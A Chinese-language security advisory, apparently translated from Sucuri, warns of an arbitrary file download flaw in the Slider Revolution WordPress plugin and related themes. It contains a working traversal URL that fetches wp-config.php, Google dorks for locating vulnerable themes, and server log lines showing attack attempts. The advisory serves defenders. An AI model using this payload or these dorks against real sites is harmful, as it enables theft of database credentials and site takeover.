约摸两个月前,有人公开披露Slider Revolution Premium WordPress Plugin 存在一个严重的安全漏洞,可以导致黑客远程下载服务器上任意文件。
地下论坛流通的POC(The proof of concept)表明黑客很容易就下载到配置文件 wp-config.php:
http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
这个一般用来下载数据库凭证信息,它可以使得黑客通过数据库(如果对外开启了数据库端口)控制你的网站。
这就是本地文件包含(LFI)漏洞攻击。黑客能够触碰,查看和下载服务器上一个本地文件。
这个漏洞非常严重,涉及到很多WordPress主题。
http://www.exploit-db.com/exploits/34511/
# WordPress CuckooTap Theme & eShop Arbitrary File Download # Risk: High # CWE number: CWE-200 # Author: Hugo Santiago # Contact: hugo.s@linuxmail.org # Date: 31/08/2014 # Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405 # Tested on: Windows 7 and Gnu/Linux # Google Dork: "Index of" +/wp-content/themes/cuckootap/ # WordPress IncredibleWP Theme Arbitrary File Download # Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/ # Google Dork: "Index of" +/wp-content/themes/IncredibleWP/ # WordPress Ultimatum Theme Arbitrary File Download # Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s # Google Dork: "Index of" +/wp-content/themes/ultimatum # WordPress Medicate Theme Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916 # Google Dork: "Index of" +/wp-content/themes/medicate/ # WordPress Centum Theme Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603 # Google Dork: "Index of" +/wp-content/themes/Centum/ # WordPress Avada Theme Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 # Google Dork: "Index of" +/wp-content/themes/Avada/ # WordPress Striking Theme & E-Commerce Arbitrary File Download # Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763 # Google Dork: "Index of" +/wp-content/themes/striking_r/ # WordPress Beach Apollo Arbitrary File Download # Vendor Homepage: https://www.authenticthemes.com/theme/apollo/ # Google Dork: "Index of" +/wp-content/themes/beach_apollo/
希望站长和安全人员赶紧修复自己的网站漏洞。
你服务器的访问日志片段类似这样的:
194.29.185.106 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1082 85.103.12.6 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 226 91.229.229.201 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 226 85.103.12.6 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1 85.103.12.6 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11 94.242.246.23 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11 74.120.13.132 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11 77.247.181.165 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 1 37.148.163.38 - - [02/Sep/2014:...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 7269 37.130.227.133 - - [02/Sep/2014...] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 403 11
源地址:http://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
翻译:SP小编
SP地址:http://www.secpulse.com/archives/106.html
本文作者:SP小编
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/106.html